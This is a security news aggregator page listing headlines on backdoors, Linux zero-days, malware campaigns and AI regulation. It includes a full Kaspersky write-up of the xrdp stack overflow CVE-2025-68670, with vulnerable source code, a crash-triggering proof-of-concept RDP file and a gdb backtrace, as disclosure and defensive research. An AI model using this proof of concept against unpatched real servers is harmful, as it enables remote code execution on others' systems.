Security-Portal.cz is an internet portal focused on computer security, hacking, anonymity, computer networks, programming, encryption, exploits, and Linux and BSD systems. It runs a number of interesting services and supports its community in interesting projects.

Categories

Former govt contractor convicted for wiping dozens of federal databases

Bleeping Computer - 1 hour 53 min ago
A 34-year-old Virginia man was found guilty of conspiring to destroy dozens of government databases after getting fired from his job as a federal contractor. [...]
Category: Hacking & Security

New Linux PamDOORa Backdoor Uses PAM Modules to Steal SSH Credentials

The Hacker News - 1 hour 57 min ago
Cybersecurity researchers have disclosed details of a new Linux backdoor named PamDOORa that's being advertised on the Rehub Russian cybercrime forum for $1,600 by a threat actor called "darkworm." The backdoor is designed as a Pluggable Authentication Module (PAM)-based post-exploitation toolkit that enables persistent SSH access by means of a magic password and specific TCP port combination.
Category: Hacking & Security

CVE-2025-68670: discovering an RCE vulnerability in xrdp

Kaspersky Securelist - 2 hours 37 min ago

In addition to KasperskyOS-powered solutions, Kaspersky offers various utility software to streamline business operations. For instance, users of Kaspersky Thin Client, an operating system for thin clients, can also purchase Kaspersky USB Redirector, a module that expands the capabilities of the xrdp remote desktop server for Linux. This module enables access to local USB devices, such as flash drives, tokens, smart cards, and printers, within a remote desktop session – all while maintaining connection security.

We take the security of our products seriously and regularly conduct security assessments. Kaspersky USB Redirector is no exception. Last year, during a security audit of this tool, we discovered a remote code execution vulnerability in the xrdp server, which was assigned the identifier CVE-2025-68670. We reported our findings to the project maintainers, who responded quickly: they fixed the vulnerability in version 0.10.5, backported the patch to versions 0.9.27 and 0.10.4.1, and issued a security bulletin. This post breaks down the details of CVE-2025-68670 and provides recommendations for staying protected.

Client data transmission via RDP

Establishing an RDP connection is a complex, multi-stage process where the client and server exchange various settings. In the context of the vulnerability we discovered, we are specifically interested in the Secure Settings Exchange, which occurs immediately before client authentication. At this stage, the client sends protected credentials to the server within a Client Info PDU (protocol data unit with client info): username, password, auto-reconnect cookies, and so on. These data points are bundled into a TS_INFO_PACKET structure and can be represented as Unicode strings up to 512 bytes long, the last of which must be a null terminator. In the xrdp code, this corresponds to the xrdp_client_info structure, which looks as follows:

{
    [..SNIP..]
    char username[INFO_CLIENT_MAX_CB_LEN];
    char password[INFO_CLIENT_MAX_CB_LEN];
    char domain[INFO_CLIENT_MAX_CB_LEN];
    char program[INFO_CLIENT_MAX_CB_LEN];
    char directory[INFO_CLIENT_MAX_CB_LEN];
    [..SNIP..]
}

The value of the INFO_CLIENT_MAX_CB_LEN constant corresponds to the maximum string length and is defined as follows:

#define INFO_CLIENT_MAX_CB_LEN 512

When transmitting Unicode data, the client uses the UTF-16 encoding. However, the server converts the data to UTF-8 before saving it.

if (ts_info_utf16_in( // [1]
        s, len_domain,
        self->rdp_layer->client_info.domain,
        sizeof(self->rdp_layer->client_info.domain)) != 0) // [2]
{
    [..SNIP..]
}

The size of the buffer for unpacking the domain name in UTF-8 [2] is passed to the ts_info_utf16_in function [1], which implements buffer overflow protection [3].

static int
ts_info_utf16_in(struct stream *s, int src_bytes, char *dst, int dst_len)
{
    int rv = 0;

    LOG_DEVEL(LOG_LEVEL_TRACE, "ts_info_utf16_in: uni_len %d, dst_len %d",
              src_bytes, dst_len);
    if (!s_check_rem_and_log(s, src_bytes + 2, "ts_info_utf16_in"))
    {
        rv = 1;
    }
    else
    {
        int term;
        int num_chars = in_utf16_le_fixed_as_utf8(s, src_bytes / 2,
                                                  dst, dst_len);
        if (num_chars > dst_len) // [3]
        {
            LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: output buffer overflow");
            rv = 1;
        }
        // String should be null-terminated. We haven't read the terminator yet
        in_uint16_le(s, term);
        if (term != 0)
        {
            LOG(LOG_LEVEL_ERROR,
                "ts_info_utf16_in: bad terminator. Expected 0, got %d", term);
            rv = 1;
        }
    }
    return rv;
}

Next, in the in_utf16_le_fixed_as_utf8_proc function, where the actual conversion from UTF-16 to UTF-8 takes place, each character is written to the output buffer only if it fits [4], and the resulting string is null-terminated [5].

{
    unsigned int rv = 0;
    char32_t c32;
    char u8str[MAXLEN_UTF8_CHAR];
    unsigned int u8len;
    char *saved_s_end = s->end;

    // Expansion of S_CHECK_REM(s, n*2) using passed-in file and line
#ifdef USE_DEVEL_STREAMCHECK
    parser_stream_overflow_check(s, n * 2, 0, file, line);
#endif
    // Temporarily set the stream end pointer to allow us to use
    // s_check_rem() when reading in UTF-16 words
    if (s->end - s->p > (int)(n * 2))
    {
        s->end = s->p + (int)(n * 2);
    }
    while (s_check_rem(s, 2))
    {
        c32 = get_c32_from_stream(s);
        u8len = utf_char32_to_utf8(c32, u8str);
        if (u8len + 1 <= vn) // [4]
        {
            /* Room for this character and a terminator. Add the character */
            unsigned int i;
            for (i = 0; i < u8len; ++i)
            {
                v[i] = u8str[i];
            }
            vn -= u8len;
            v += u8len;
        }
        else if (vn > 1)
        {
            /* We've skipped a character, but there's more than one byte
             * remaining in the output buffer. Mark the output buffer as
             * full so we don't get a smaller character being squeezed into
             * the remaining space */
            vn = 1;
        }
        rv += u8len;
    }
    // Restore stream to full length
    s->end = saved_s_end;
    if (vn > 0)
    {
        *v = '\0'; // [5]
    }
    ++rv;
    return rv;
}

Consequently, up to 512 bytes of input data in UTF-16 are converted into UTF-8 data, which can also reach a size of up to 512 bytes.

CVE-2025-68670: an RCE vulnerability in xrdp

The vulnerability exists within the xrdp_wm_parse_domain_information function, which processes the domain name saved on the server in UTF-8. Like the functions described above, this one is called before client authentication, meaning exploitation does not require valid credentials. The call stack below illustrates this.

xrdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax, int decode, char *resultBuffer)
xrdp_login_wnd_create(struct xrdp_wm *self)
xrdp_wm_init(struct xrdp_wm *self)
xrdp_wm_login_state_changed(struct xrdp_wm *self)
xrdp_wm_check_wait_objs(struct xrdp_wm *self)
xrdp_process_main_loop(struct xrdp_process *self)

The code snippet where the vulnerable function is called looks like this:

char resultIP[256]; // [7]
[..SNIP..]
combo->item_index = xrdp_wm_parse_domain_information(
    self->session->client_info->domain, // [6]
    combo->data_list->count,
    1,
    resultIP /* just a dummy place holder, we ignore */);

As you can see, the first argument of the function in line [6] is the domain name up to 512 bytes long. The final argument is the resultIP buffer of 256 bytes (as seen in line [7]). Now, let’s look at exactly what the vulnerable function does with these arguments.

static int
xrdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
                                 int decode, char *resultBuffer)
{
    int ret;
    int pos;
    int comboxindex;
    char index[2];

    /* If the first char in the domain name is '_' we use the domain name as IP */
    ret = 0; /* default return value */
    /* resultBuffer assumed to be 256 chars */
    g_memset(resultBuffer, 0, 256);
    if (originalDomainInfo[0] == '_') // [8]
    {
        /* we try to locate a number indicating what combobox index the user
         * prefer the information is loaded from domain field, from the client
         * We must use valid chars in the domain name.
         * Underscore is a valid name in the domain.
         * Invalid chars are ignored in microsoft client therefore we use '_'
         * again. this sec '__' contains the split for index. */
        pos = g_pos(&originalDomainInfo[1], "__"); // [9]
        if (pos > 0)
        {
            /* an index is found we try to use it */
            LOG(LOG_LEVEL_DEBUG, "domain contains index char __");
            if (decode)
            {
                [..SNIP..]
            }
            /* pos limit the String to only contain the IP */
            g_strncpy(resultBuffer, &originalDomainInfo[1], pos); // [10]
        }
        else
        {
            LOG(LOG_LEVEL_DEBUG, "domain does not contain _");
            g_strncpy(resultBuffer, &originalDomainInfo[1], 255);
        }
    }
    return ret;
}

As seen in the code, if the first character of the domain name is an underscore (line [8]), the function locates the double-underscore separator (“__”) in it (line [9]) and copies everything between the initial “_” and that separator into the resultIP buffer (line [10]). Since the domain name can be up to 512 bytes long, this portion may not fit into the 256-byte buffer even if the domain name is technically well-formed. The excess data is therefore written onto the thread stack, potentially modifying the return address. If an attacker crafts a domain name that overflows the stack buffer and replaces the return address with a value they control, execution flow will shift according to the attacker’s intent upon returning from the vulnerable function, allowing arbitrary code execution in the context of the compromised process (in this case, the xrdp server).

To exploit this vulnerability, the attacker simply needs to specify a domain name that, after being converted to UTF-8, contains more than 256 bytes between the initial “_” and the subsequent “__”. Given that the conversion follows specific rules easily found online, this is a straightforward task: one can simply take advantage of the fact that the length of the same string can vary between UTF-16 and UTF-8. In short, this involves avoiding ASCII and certain other characters that may take up more space in UTF-16 than in UTF-8, while also being careful not to abuse characters that expand significantly after conversion. If the resulting UTF-8 domain name exceeds the 512-byte limit, a conversion error will occur.

PoC

As a PoC for the discovered vulnerability, we created the following RDP file containing the RDP server’s IP address and a long domain name designed to trigger a buffer overflow. In the domain name, we used a specific number of Cyrillic К (U+041A) characters to overwrite the return address with the string “AAAAAAAA”. The contents of the RDP file are shown below:

alternate full address:s:172.22.118.7
full address:s:172.22.118.7
domain:s:_veryveryveryverKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKeryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveaaaaaaaaryveryveryveryveryveryveryveryveryveryveryveryverylongdoAAAAAAAA__0
username:s:testuser

When you open this file, the mstsc.exe process connects to the specified server. The server processes the data in the file and attempts to write the domain name into the buffer, which results in a buffer overflow and the overwriting of the return address. If you look at the xrdp memory dump at the time of the crash, you can see that both the buffer and the return address have been overwritten. The application terminates during the stack canary check. The example below was captured using the gdb debugger.

gef➤ bt
#0  __pthread_kill_implementation (no_tid=0x0, signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:44
#1  __pthread_kill_internal (signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:78
#2  __GI___pthread_kill (threadid=0x7adb2dc71740, signo=signo@entry=0x6) at ./nptl/pthread_kill.c:89
#3  0x00007adb2da42476 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/posix/raise.c:26
#4  0x00007adb2da287f3 in __GI_abort () at ./stdlib/abort.c:79
#5  0x00007adb2da89677 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7adb2dbdb92e "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:156
#6  0x00007adb2db3660a in __GI___fortify_fail (msg=msg@entry=0x7adb2dbdb916 "stack smashing detected") at ./debug/fortify_fail.c:26
#7  0x00007adb2db365d6 in __stack_chk_fail () at ./debug/stack_chk_fail.c:24
#8  0x000063654a2e5ad5 in ?? ()
#9  0x4141414141414141 in ?? ()
#10 0x00007adb00000a00 in ?? ()
#11 0x0000000000050004 in ?? ()
#12 0x00007fff91732220 in ?? ()
#13 0x000000000000030a in ?? ()
#14 0xfffffffffffffff8 in ?? ()
#15 0x000000052dc71740 in ?? ()
#16 0x3030305f70647278 in ?? ()
#17 0x616d5f6130333030 in ?? ()
#18 0x00636e79735f6e69 in ?? ()
#19 0x0000000000000000 in ?? ()

Protection against vulnerability exploitation

It is worth noting that the vulnerable function can be protected by a stack canary via compiler settings. In most compilers, this option is enabled by default, which prevents an attacker from simply overwriting the return address and executing a ROP chain. To successfully exploit the vulnerability, the attacker would first need to obtain the canary value.

The vulnerable function is also referenced by the xrdp_wm_show_edits function; however, even in that case, if the code is compiled with secure settings (using stack canaries), the most trivial exploitation scenario remains unfeasible.

Nevertheless, a stack canary is not a panacea. An attacker could potentially leak or guess its value, allowing them to overwrite the buffer and the return address while leaving the canary itself unchanged. In the security bulletin dedicated to CVE-2025-68670, the xrdp maintainers advise against relying solely on stack canaries when using the project.

Vulnerability remediation timeline
  • 12/05/2025: we submitted the vulnerability report via https://github.com/neutrinolabs/xrdp/security.
  • 12/05/2025: the project maintainers immediately confirmed receipt of the report and stated they would review it shortly.
  • 12/15/2025: investigation and prioritization of the vulnerability began.
  • 12/18/2025: the maintainers confirmed the vulnerability and began developing a patch.
  • 12/24/2025: the vulnerability was assigned the identifier CVE-2025-68670.
  • 01/27/2026: the patch was merged into the project’s main branch.

Conclusion

A responsible approach to code not only makes our own products more solid but also strengthens popular open-source projects. We have previously shared how security assessments of KasperskyOS-based solutions – such as Kaspersky Thin Client and Kaspersky IoT Secure Gateway – led to the discovery of several vulnerabilities in Suricata and FreeRDP, which project maintainers quickly patched. CVE-2025-68670 is yet another one of those stories.

However, discovering a vulnerability is only half the battle. We would like to thank the xrdp maintainers for their rapid response to our report, for fixing the vulnerability, and for issuing a security bulletin detailing the issue and risk mitigation options.

New Linux 'Dirty Frag' zero-day gives root on all major distros

Bleeping Computer - 2 hours 53 min ago
A new Linux zero-day vulnerability, named Dirty Frag, allows local attackers to gain root privileges on most major Linux distributions with a single command. [...]
Category: Hacking & Security

AI clones: the good, the bad, and the ugly

Computerworld.com [Hacking News] - 3 hours 38 min ago

AI is capable of mimicking a real person. It’s clear this capability exists, and the ethics of using AI for this purpose are often very clear. But increasingly, new applications are leading to ethically murky results. 

The good

For example, the CEO of a company, or a politician, could choose to create a clone using AI tools, creating a chatbot plus an avatar — a digital twin — that can interact with people on their behalf. Silicon Valley is big on the idea: Meta’s Mark Zuckerberg and LinkedIn co-founder Reid Hoffman are working on, or have already created, digital twins of themselves. 

Cloned politicians include Pakistan’s Imran Khan, who used an authorized voice clone to campaign from prison, and New York City Mayor Eric Adams, who used voice-cloned robocalls to speak with constituents in languages like Mandarin and Yiddish.

This kind of use case is probably ethical — as long as the people interacting know that they’re dealing with a digital clone and not a real person. 

The bad

The flip side of ethical uses for AI-generated clones is the non-consensual (and therefore unethical) cases, of which there are already many.

Among these unethical, non-consensual uses for AI cloning are deepfake videos, where a celebrity’s face is superimposed on a porn performer’s body. In all such cases, the ethics are clear. This is all very wrong.

But with China leading the way in the emergence of AI clones, the ethics are becoming far murkier. 

And the ugly

One emerging trend involves workers using specialized software to build digital versions of their bosses or colleagues. The most prominent project driving this trend is Colleague Skill, which was posted in late March by its creator, a 24-year-old Shanghai-based engineer named Zhou Tianyi. 

Colleague Skill and its forks and copycats, which tend to be open source, enable people to upload chat histories, emails, and internal documents to create a functional persona that mimics a specific coworker’s professional expertise and communication style. The technology stack includes tools like Claude, Kimi, ChatGPT, DeepSeek API, OCR (Tesseract), and sentiment analysis modules.

Colleague Skill uses a person’s past communications to build a talking replica of their personality. If you think of a regular AI as a general student who knows a little bit about everything, this tool acts like a specialized mask that forces the AI to behave like one specific individual. 

In other words, it produces a chatbot with the knowledge and patterns of speech of a real person. 

Colleague Skill started as a satirical commentary on AI-driven layoffs. But some employees began using it in earnest to clone their colleagues. There are several stated reasons for doing so, including retaining institutional knowledge and having an instant sounding board to “discuss” plans and ideas with. 

A similar motivation is the use of AI to clone bosses, so employees can better predict how that boss might react to the employees’ work. 

In most of these instances, according to reports out of China, the creation of the boss-bot or colleague clone is nonconsensual. 

Is non-consensually basing a custom chatbot on a colleague or boss unethical? 

And then it got personal (and weird)

Zhou, creator of Colleague Skill, later forked it into something called Ex-Partner Skill. The idea is to re-create a former partner with AI so the user can continue the relationship.

It operates on the same technical engine but applies it to a much more personal part of life. Users upload photos, social posts, chat logs, and other content. The AI chatbot can then mimic the former partner’s tone, catchphrases, and subtle linguistic nuances, producing something that “truly sounds like them — speaks with their catchphrases, replies in their style, remembers the places you went together.”

This allows a person to simulate conversations with someone who is no longer in their life.

If Colleague Skill is in a grey area, Ex-Partner Skill is in a darker grey area. 

(Note: many of the original repositories for Ex-Partner Skill have been removed from public view in China or “sanitized” after regulatory pressure. But the framework reportedly continues to circulate in private developer circles, and similar tools are increasingly used for “digital resurrection.”)

Ethically, the concept exists on a wide spectrum somewhere between therapy at one end and revenge porn at the other. (It resembles revenge porn in the sense that “content” consensually made by two people for one purpose is later used unilaterally by one person in a way that the other person might find objectionable.)

Or maybe it’s closer to the “deathbot” phenomenon, where an AI-generated simulation provides a fake version of the dearly departed. (In both cases, the user interacts with a digital twin of someone who is no longer present in one’s life.) In fact, some people in China are using Ex-Partner Skill as a deathbot for a deceased loved one. 

The lack of consent feels like an ethical lapse. But we don’t consider it unethical to think about, remember, imagine conversations with, or journal about ex-partners — or dead family members. 

Boosters of the Ex-Partner Skill idea say that conversations with digital exes are therapeutic. They point out that because it’s private, it’s not harassment or stalking or an invasion of privacy. Instead, they argue, it helps with personal reflection and emotional healing.

As for people who have died, according to Chinese media reports, some users say the tool gives them a sense of closure and allows them to say the things they wish they could have said to the real person. But is it really closure if one person is still obsessively trying to interact — or pretend to interact — with the other person?

It’s healthy to communicate. But it’s not communication when a person is by themselves talking to no one and sending messages to a person who never gets those messages.

While ex-bots are a thing these days in China, the trend is showing up elsewhere. Some Character.AI users outside of China have created chatbots based on ex-partners, even though the company has changed its Terms of Service to explicitly ban the creation of bots using the likenesses of private individuals without their permission.

The emergence of nonconsensual cloning of coworkers, bosses and ex-partners is a new challenge to our sense of right and wrong, and yet another way AI is challenging us to step up and figure out how to respond.

Category: Hacking & Security

Linux Kernel Dirty Frag LPE Exploit Enables Root Access Across Major Distributions

The Hacker News - 5 hours 26 min ago
Details have emerged about a new, unpatched local privilege escalation (LPE) vulnerability impacting the Linux kernel. Dubbed Dirty Frag, it has been described as a successor to Copy Fail (CVE-2026-31431, CVSS score: 7.8), a recently disclosed LPE flaw impacting the Linux kernel that has since come under active exploitation in the wild. The vulnerability was reported to Linux kernel maintainers
Category: Hacking & Security

Canvas login portals hacked in mass ShinyHunters extortion campaign

Bleeping Computer - 12 hours 1 min ago
The ShinyHunters extortion gang has breached education technology giant Instructure again, this time exploiting another vulnerability to deface Canvas login portals for hundreds of colleges and universities. [...]
Category: Hacking & Security

New TCLBanker malware self-spreads over WhatsApp and Outlook

Bleeping Computer - 12 hours 1 min ago
A new trojan named TCLBanker, which targets 59 banking, fintech, and cryptocurrency platforms, uses a trojanized MSI installer for Logitech AI Prompt Builder to infect systems. [...]
Category: Hacking & Security

LinkedIn illegally blocking free accounts from seeing ‘who’s viewed your profile’ data, group alleges

Computerworld.com [Hacking News] - May 7, 2026 - 22:28

A LinkedIn feature that allows paid subscribers to view a list of visitors to their profile should be made available to all EU users free of charge to comply with the region’s General Data Protection Regulation (GDPR), a legal complaint launched by the None of Your Business (NOYB) digital rights group has claimed.

Filed this week in an Austrian court, the group’s argument is that LinkedIn’s ‘Who’s Viewed Your Profile’ feature contravenes the GDPR Article 15, which covers a subject’s right of access to their own data.

NOYB has a history of taking on tech companies. In 2025, Google was hit by a €325 million ($381 million) fine by French privacy regulator, the CNIL, over its data collection and advertising policies after a complaint by the group.

Contradictory policy

LinkedIn began offering users the ability to see who has viewed their profile around 2007, later turning this into a paywalled perk in a move that pre-dated the arrival of GDPR in 2018.

According to NOYB, this commercialization left non-subscription users in a bind. Profile visitor data should legally be accessible to EU citizens under GDPR, but when they ask for this via a formal Data Subject Access Request (DSAR), LinkedIn refuses access, citing data protection.

Despite this, if the user subscribes to a LinkedIn Premium Career plan starting at €30 per month ($40 per month in the US), the same data suddenly becomes accessible.

“It is particularly absurd that LinkedIn is using a supposed ‘data protection interest’ as an argument to deny the right of access to data under the GDPR,” argued NOYB’s press release.

In NOYB’s view, LinkedIn’s policy is contradictory. The company limits access to something that should legally be free because allowing access would undermine the incentive to pay for it.

“Either the data must not be accessible to anyone, or – if it is clear to the visitor that the data is visible – it must also be disclosed in accordance with Article 15 GDPR,” NOYB said. In its view, LinkedIn’s policy of charging to access this data is illegal and the company should be fined to prevent future breaches.

Right to view

LinkedIn will doubtless point out to the Austrian Data Protection Authority that all users, including free ones, can opt out of having their profile visits made visible by toggling off the ‘Visibility when viewing other profiles’ setting under Settings > Visibility. Each visit such a user makes to another profile is then recorded as one by an ‘Anonymous LinkedIn Member’. Free users can also see the last five visitors to their profile, as long as those visitors have not selected this anonymity setting.

It’s possible the company will further argue that, under Article 15, the right of users to know who has viewed their data conflicts with the right of other users to maintain their own privacy.

When contacted for response, a LinkedIn spokesperson sent the following statement: “This assertion [by NOYB] is false. Not only is it incorrect that only Premium members can see who has viewed their profile, but we also satisfy GDPR Article 15 by disclosing the information at issue via our Privacy Policy.”

According to Helen Brain, partner and head of commercial at Square One Law in the UK, the case would cause problems for LinkedIn’s lawyers even if the outcome remained uncertain.

“NOYB appears to have a strong argument that LinkedIn is breaching GDPR in one way or the other, but it’s impossible to say how likely they are to succeed before we see LinkedIn’s counter-arguments,” she said.

The complaint is on strong ground when arguing that profile visits should fall under GDPR Article 15 Right of Access. “If the viewer’s personal data is private and shouldn’t be disclosed in response to a DSAR by the viewed person, logically that means the viewer’s personal data should not be disclosed to premium account holders either,” said Brain. “If NOYB is successful in its complaint, the Austrian Data Protection Authority could ultimately issue a fine, and that could be substantial.” 

However, predicting the wider effect on technology companies using the same ‘data as a feature’ to incentivize paid subscriptions is difficult in advance of a ruling. If NOYB prevails, LinkedIn could be ordered to stop its disclosure of profile searchers or, alternatively, to make this available free of charge in response to DSARs.

However, Brain believed the issue might come down to the way consent is gained. “Even if LinkedIn is ordered to change what it is doing, it will find a new way to gain consent to permit the disclosures of searchers lawfully and continue to charge for the data they gather.”

Category: Hacking & Security

Mozilla says 271 vulnerabilities found by Mythos have "almost no false positives"

Ars Technica - May 7, 2026 - 21:18

The disbelief was palpable when Mozilla’s CTO last month declared that AI-assisted vulnerability detection meant “zero-days are numbered” and “defenders finally have a chance to win, decisively.” After all, it looked like part of an all-too-familiar pattern: Cherry-pick a handful of impressive AI-achieved results, leave out any of the fine print that might paint a more nuanced picture, and let the hype train roll on.

Mindful of the skepticism, Mozilla on Thursday provided a behind-the-scenes look into its use of Anthropic Mythos—an AI model for identifying software vulnerabilities—to ferret out 271 Firefox security flaws over two months. In a post, Mozilla engineers said the finally ready-for-prime-time breakthrough they achieved was primarily the result of two things: (1) improvement in the models themselves and (2) Mozilla’s development of a custom “harness” that supported Mythos as it analyzed Firefox source code.

"Almost no false positives"

The engineers said their earlier brushes with AI-assisted vulnerability detection were fraught with “unwanted slop.” Typically, someone would prompt a model to analyze a block of code, and the model would produce plausible-sounding bug reports, often at unprecedented scale. Invariably, however, when human developers investigated further, they’d find a large percentage of the details had been hallucinated. The humans would then need to invest significant work handling the vulnerability reports the old-fashioned way.

New PCPJack worm steals credentials, cleans TeamPCP infections

Bleeping Computer - May 7, 2026 - 20:35
A new malware framework called PCPJack is stealing credentials from exposed cloud infrastructure while actively removing TeamPCP's access to the systems. [...]
Category: Hacking & Security

Australia warns of ClickFix attacks pushing Vidar Stealer malware

Bleeping Computer - May 7, 2026 - 20:00
The Australian Cyber Security Centre (ACSC) is warning organizations of an ongoing malware campaign using the ClickFix social engineering technique to distribute the Vidar Stealer info-stealing malware. [...]
Category: Hacking & Security

Ivanti EPMM CVE-2026-6973 RCE Under Active Exploitation Grants Admin-Level Access

The Hacker News - May 7, 2026 - 19:55
Ivanti is warning that a new security flaw impacting Endpoint Manager Mobile (EPMM) has been exploited in limited attacks in the wild. The high-severity vulnerability, CVE-2026-6973 (CVSS score: 7.2), is a case of improper input validation affecting EPMM before versions 12.6.1.1, 12.7.0.1, and 12.8.0.1. It allows "a remotely authenticated user with administrative access to achieve remote code
Category: Hacking & Security

PCPJack Credential Stealer Exploits 5 CVEs to Spread Worm-Like Across Cloud Systems

The Hacker News - 7 May 2026 - 19:45
Cybersecurity researchers have disclosed details of a new credential theft framework dubbed PCPJack that targets exposed cloud infrastructure and ousts any artifacts linked to TeamPCP from the environments. "The toolset harvests credentials from cloud, container, developer, productivity, and financial services, then exfiltrates the data through attacker-controlled infrastructure while attempting
Category: Hacking & Security

Container Security Misconfigurations That Still Go Unnoticed

LinuxSecurity.com - 7 May 2026 - 19:16
Container security has long carried a reputation for resilience, but attackers have increasingly shifted their focus toward something easier to exploit: the Kubernetes environments surrounding the containers themselves.
Category: Hacking & Security
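Many of the Kubernetes missteps attackers lean on are visible statically in the pod spec itself. The sketch below shows the shape of such a check; the field names follow the Kubernetes Pod spec, but the rule set is a small illustrative sample, not a complete admission policy.

```python
# Minimal static check for a few well-known risky pod-spec settings,
# assuming the manifest has already been loaded into a Python dict.
def risky_settings(pod: dict) -> list:
    findings = []
    spec = pod.get("spec", {})
    if spec.get("hostNetwork"):
        findings.append("pod shares the node's network namespace (hostNetwork)")
    for c in spec.get("containers", []):
        sc = c.get("securityContext", {})
        if sc.get("privileged"):
            findings.append(f"{c['name']}: privileged container")
        if sc.get("allowPrivilegeEscalation", True):
            # Kubernetes defaults this to true, so silence requires opting out.
            findings.append(f"{c['name']}: allowPrivilegeEscalation not disabled")
    for v in spec.get("volumes", []):
        if "hostPath" in v:
            findings.append(f"volume {v['name']}: hostPath exposes the node filesystem")
    return findings

pod = {
    "spec": {
        "hostNetwork": True,
        "containers": [{"name": "app", "securityContext": {"privileged": True}}],
        "volumes": [{"name": "host", "hostPath": {"path": "/"}}],
    }
}
for finding in risky_settings(pod):
    print(finding)
```

In practice these checks run as admission controllers or policy engines rather than ad hoc scripts, but the underlying rules are this simple, which is why such misconfigurations going unnoticed is a process failure more than a tooling gap.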

EU lawmakers strike provisional deal to soften AI Act

Computerworld.com [Hacking News] - 7 May 2026 - 17:20

European Union member states and the European Parliament agreed early Thursday to push back the toughest deadlines under the bloc’s AI Act, giving enterprises more time to prepare for high-risk compliance.

Under the provisional deal between negotiators for the European Parliament and European Council, high-risk AI systems will face new deadlines of Dec. 2, 2027 for stand-alone systems and Aug. 2, 2028 for AI used in products covered by EU sectoral safety rules, a European Parliament statement said. The original deadline was Aug. 2, 2026.

The deal still needs formal adoption by both Parliament and Council before it can enter into force. The co-legislators intend to complete that step before Aug. 2. Until they do, the original deadline applies as drafted.

“Today’s agreement on the AI Act significantly supports our companies by reducing recurring administrative costs,” Marilena Raouna, Cyprus’s deputy minister for European affairs, said in a statement from the Council, which is composed of representatives of each of the EU’s 27 member states. Cyprus holds the rotating presidency of the Council, which negotiates on behalf of member states.

The breakthrough comes nine days after previous discussions collapsed without agreement.

Fewer restrictions, more time to implement

The provisional agreement removes overlapping rules for AI in machinery products, Parliament said. These will now follow only sectoral safety rules, with safeguards meant to ensure equivalent health and safety protection.

It also narrows what counts as a “safety component” under the AI Act. AI features that only assist users or improve performance will not automatically be treated as high-risk, the Parliament said, as long as a failure does not create health or safety risks.

For wider sectors such as medical devices, toys, lifts, machinery and watercraft, the co-legislators agreed on a mechanism to resolve overlaps between the AI Act and existing sectoral laws, the Council said in its statement.

The deadline for member states to set up AI regulatory sandboxes has been pushed back by a year to Aug. 2, 2027, the Council said. Watermarking obligations on AI-generated content, on the other hand, will apply earlier than the Commission proposed, from Dec. 2, 2026 instead of Feb. 2, 2027, the Parliament said.

Mid-size firms get more breathing room. Exemptions previously available only to small and medium-sized enterprises now extend to small mid-cap companies, the Council said. The deal also clarifies that the EU’s AI Office will supervise general-purpose AI systems centrally, with national authorities keeping responsibility in areas including law enforcement, border management, judicial authorities and financial institutions.

“With this agreement, we show that politics can move just as quickly as technology,” said Arba Kokalari, the Parliament’s co-rapporteur for the Internal Market and Consumer Protection committee. “We now make the AI rules more workable in practice, remove overlaps and pause the high-risk requirements.”

Parliament and Council also agreed to ban AI systems that create child sexual abuse material or that depict identifiable people in sexually explicit content without consent, the Parliament said. The ban covers placing such systems on the EU market, doing so without safety measures to prevent misuse, and using them to generate the content. Companies have until Dec. 2, 2026 to comply.

“Alongside simplification measures, we are banning nudification apps, a key part of the Parliament’s mandate, and, of course, the creation of child sexual abuse material using AI systems,” said Michael McNamara, the Parliament’s co-rapporteur for the Civil Liberties, Justice and Home Affairs committee.

What still applies

Several parts of the AI Act keep moving on their original schedule. Bans on unacceptable-risk AI have applied since February 2025, according to the European Commission. The general-purpose AI rules came into force in August 2025. The transparency obligations under Article 50, including disclosure for chatbot interactions, are set to apply from Aug. 2, 2026.

The provisional agreement is part of the seventh omnibus package on simplification, proposed by the Commission on Nov. 19 last year in response to the Draghi report on EU competitiveness.

Category: Hacking & Security
Syndicate content